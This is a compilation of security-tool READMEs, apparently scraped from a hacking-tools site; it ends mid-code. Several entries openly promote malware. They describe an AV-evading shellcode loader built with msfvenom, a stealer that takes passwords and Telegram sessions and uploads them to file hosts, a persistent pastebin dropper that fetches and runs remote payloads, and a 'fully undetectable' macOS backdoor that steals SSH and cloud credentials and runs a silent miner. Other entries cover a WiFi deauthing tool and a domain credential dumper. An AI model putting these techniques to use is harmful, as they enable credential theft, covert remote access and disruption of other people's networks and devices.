NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js then giving passing -sp http://www.target.com will result in teh output http://www.target.com/path/to/example.js and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, the pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429, s403, sTO, sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile for example (separate with a space). The mobile user agent option is an combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know
    ๏ค˜

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE!ย โ˜• (I could use the caffeine!)

๏ค˜
/XNL-h4ck3r


FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format( using either CobaltStrike or msfvenom ) for instance, in msfvenom, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode( in binary/raw format ) into a UUID string format using the Python3 script, bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • xor encrypt the UUID strings in the uuid.txt using the Python3 script, xor_encryptor.py.

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file, xor_crypted_out.txt, and paste it in the C++ file as an array of unsigned char i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}

Execution

This shellcode injection technique comprises the following subsequent steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It xor decrypts the payload using the xor key value
  • Uses UuidFromStringA to convert UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
  • Use EnumChildWindows to execute the payload previously loaded into memory( in step 1 )

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the xor key(row 86) to what you wish. This can be done in the ./xor_encryptor.py python3 script by changing the KEY variable.
  • You have to change the default executable filename value(row 90) to your filename.
  • The command for compiling is provided in the C++ file( around the top ). NB: mingw was used but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it

disclaimers:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
    ๏˜‚
  • for developers
    you can read the source code and try to understand how to make a project like this

Features


module Short description
Dump password steal All passwords saved , upload file a passwords saved to mega
Dump History dump browser history
dump files Steal files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works ? The recording session in Telegram is stored locally in this particular path C:\Users<pc name >\AppData\Roaming\Telegram Desktop in the 'tedata' folder
C:
โ””โ”€โ”€ Users
โ”œโ”€โ”€ .AppData
โ”‚ย ย  โ””โ”€โ”€ Roaming
โ”‚ย ย  โ””โ”€โ”€ TelegramDesktop
โ”‚ย ย  โ””โ”€โ”€ tdata

Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/ The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV

module
2- Dropper
  • What requirements does he need from you?
  • And how does it work?? Requirements The first thing it asks you is the URL of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct, meaning that it must be the end Its Yama .exe or .png, whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work?ย 

The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

AV detection


Media



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt

Usage

The SIEM IP address in the codes should be changed.

In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:

Usage: python finding-new-port-nessus.py

In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.


Usage

I cannot be held responsible for the malicious use of the vehicle.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python


Unoffical Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

bluetooth info bt_info = flipper.bt.info()">
#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable. The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc. """ flipper.storage.write.send(text_two) time.sleep(3) #Don't forget to stop flipper.storage.write.stop()">
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




ย macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well

Roadmap

v0.1

  • โœ…Get down detection to 0/26 on antiscan.me
  • โœ…Add Changelog
  • โœ…Daemonise Backdoor
  • โœ…Add Crypter
  • โœ…Add More Backdoor templates
  • โœ…Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • โœ…Add AntiVM
  • [] Implement tor hidden services
  • โœ…Add Logger
  • โœ…Add Password stealer
  • [] Add KeyLogger
  • โœ…Add some new evasion options
  • โœ…Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open a issue and ill make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm

Usage

โ””โ”€# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




Autodeauth - A Tool Built To Automatically Deauth Local Networks


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of networks ssids/mac addre sses to avoid (Comma seperated)
--whitelist WHITELIST, -w WHITELIST
List of networks ssids/mac addresses to target (Comma seperated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup you are able to run the script by using autodeauth from any directory

Command line

Networks with spaces can be represented using their mac addresses

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected and fits under the whitelist/blacklist criteria its network information is saved as a json file in /var/log/autodeauth/

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Lets say you wanted the following config to be setup as a service

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.

Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).


Installation

Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:

pip install masky

The Masky agent executable is already included within the PyPi package.

Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
# Define the authentication parameters
